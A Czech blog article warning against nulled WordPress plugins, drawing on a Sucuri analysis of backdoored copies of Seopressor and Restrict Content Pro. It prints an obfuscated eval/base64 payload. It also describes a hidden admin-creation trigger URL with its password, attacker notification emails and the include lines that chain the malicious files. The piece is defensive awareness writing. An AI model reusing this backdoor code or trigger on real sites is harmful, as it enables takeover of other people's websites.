Přestože je pro WordPress řada free pluginů, prémiové pluginy často nabízí funkčnost, které pluginy zdarma nemají. A určitě jste již narazili na weby, kde se dají stáhnout zdarma.
Podobné weby, je nabízí pod označením nulled, což znamená zrušenou kontrolu, či ochranu licence. Stačí do Google zadat „<nazev pluginu> free download“ a najdete celou řadu stránek, kde je stáhnete. Tento článek však nemá být návodem, jak najít podobné weby, právě naopak.
Samozřejmě, že získat něco hodnotného zdarma, může být lákavé, ale zároveň si musíte položit otázku, proč vám vlastně majitelé těchto webů, pluginy „nezištně“ nabízí?
Odpověď je jednoduchá – jejich motivací je zisk. Často si totiž instalací šablony, nebo pluginu, který byl v podstatě ukraden, přidáte do vašeho webu nevítaná zadní vrátka a do systému se vám dostane nepovolaná osoba.
Ukážeme si několik případů, které na svém blogu zveřejnila firma Sucuri v článku „Unmasking free premium WordPress plugin„.
Seopressor
Tento plugin je možné pořídit za 47 dolarů, tedy za cca 500 korun. Při kontrole zdrojových souborů byl v souboru central.class.php nalezen následující kód.
eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );
Osobně, pokud na podobný kód v pluginu narazím a není takový plugin pro mne nezbytný, okamžitě jej odstraním. Ani nepátrám po tom, co zakódovaná část obsahuje, vzhledem k tomu, že si nikdy nemohu být jist, co obsahuje. I kdyby to byl neškodný kód, který zakódoval developer, aby mu někdo neokopíroval jeho práci, má u mne smůlu. V oficiálním repositáři by se pluginy s podobně zakódovanou částí, neměly vyskytovat.
Ale zpět k nalezenému kódu. Když jej v Sucuri rozkódovali, zobrazily se tyto dvě funkce:
Obě funkce jsou zavěšeny do hooku wp_head.
První, vytvoří uživatele wordpress, s administrátorskými právy, pokud zavoláte url, která bude mít na konci „?cms=jjoplmh“.
Druhá funkce zkontroluje, zda existuje uživatel wordpress a pokud ne, odešle informaci o webu na email thomasza@gmx.com.
Shrnutí: stáhnete si nulled plugin, po nainstalování odešle funkce url vašeho webu na email thomasza@gmx.com, útočník zadá do prohlížeče www.vasweb.cz/?cms=jjoplmh a tím si vytvoří uživatele wordpress s heslem gh67io9Cjm a právy administrátora.
Restrict Content Pro
V tomto pluginu byl nejprve nalezen soubor sidebar.php, ve složce includes. Jeho velikost byla 72 847 bytů a kód vypadal jako zakomentované formuláře pro option pluginu. Pokud si kód projdete – odkaz, někde uprostřed, najdete nezakomentovanou část kódu, která vypadá obdobně, jako v předchozím příkladu:
Útočník se snaží zamezit detekci zakódovaného řetězce, pomocí nějakého nástroje a zároveň se snaží, aby byl kód při vizuální kontrole přehlédnut. Přesto obsahuje zakódovanou část, která nám po dekódování vrátí email wordpressslog@yandex.com. Funkce, stejně jako v minulém případě odesílá email s informací o url webu.
Nyní nám schází ještě druhá funkce, která vytvoří uživatele s admin právy. Byla nalezena v souboru class.php, maskovaná stejným způsobem.
Protože samy o sobě, jsou takto funkce neškodné, útočník pozměnil hlavní soubor pluginu, kam přidal do kódu:
include'includes/class.php'; include'includes/sidebar.php';
Tím je vše propojeno a váš web může být lehce ovládnut a využit.
Dá se říci, že tento problém nevznikne, pokud nebudete používat „ukradené“ pluginy, nebo šablony. Bohužel, často jsou rizika podceňována, nebo se stránka tváří natolik důvěryhodně, že neznalého uživatele zmate. Proto, pokud máte podezření na škodlivý kód na webu, použijte některý z pluginů v tomto článku 5 pluginů pro detekci malware ve WordPress.